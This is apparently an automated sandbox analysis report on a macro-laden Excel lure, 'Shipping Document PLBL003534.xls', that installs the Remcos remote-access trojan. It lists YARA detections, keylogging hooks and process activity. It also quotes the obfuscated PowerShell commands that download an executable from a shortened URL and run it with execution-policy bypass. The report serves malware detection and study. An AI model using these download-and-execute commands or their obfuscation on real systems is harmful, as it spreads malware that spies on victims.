                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,

                E-Banking Fraud:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Content ' L'Ji 6 7 8 9 10 " 12 13 14 15 16 17 18 19 20 21 ~ 22 M'" 23
                Source: Document image extraction number: 0Screenshot OCR: Enable Content L) 'b m ~
                Source: Document image extraction number: 1Screenshot OCR: Enable Content LJi ~m
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: Shipping Document PLBL003534.xlsInitial sample: EXEC
                Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                Source: Shipping Document PLBL003534.xlsInitial sample: Sheet size: 5194
                Found obfuscated Excel 4.0 MacroShow sources
                Source: Shipping Document PLBL003534.xlsInitial sample: High usage of CHAR() function: 16
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\sm.exeJump to dropped file
                Wscript starts Powershell (via cmd or directly)Show sources
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_004736A8
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00474258
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00474268
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00477509
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00477518
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00473698
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00477769
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00477778
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00471AF0
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00471B00
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A5959
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A0048
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_047A6480
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 12_2_00471DB0
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040D2A6
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F36A8
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F1DB0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F4258
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F4268
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7509
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7518
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F3698
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7769
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F7778
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F1AF0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_004F1B00
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A5908
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A0006
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A0048
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 22_2_043A6480
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_002936A8
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00291DB0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00294268
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00294258
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00297509
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00297518
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00293698
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_0029776A
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00297778
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00291AF0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_00291B00
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02255909
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02250006
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02250048
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 23_2_02256480
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040D2A6
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_003936A8
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00391DB0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00394268
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00394258
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397518
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397509
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00393698
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397778
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00397772
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00391AF0
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_00391B00
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04395909
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04396480
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04390007
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04390048
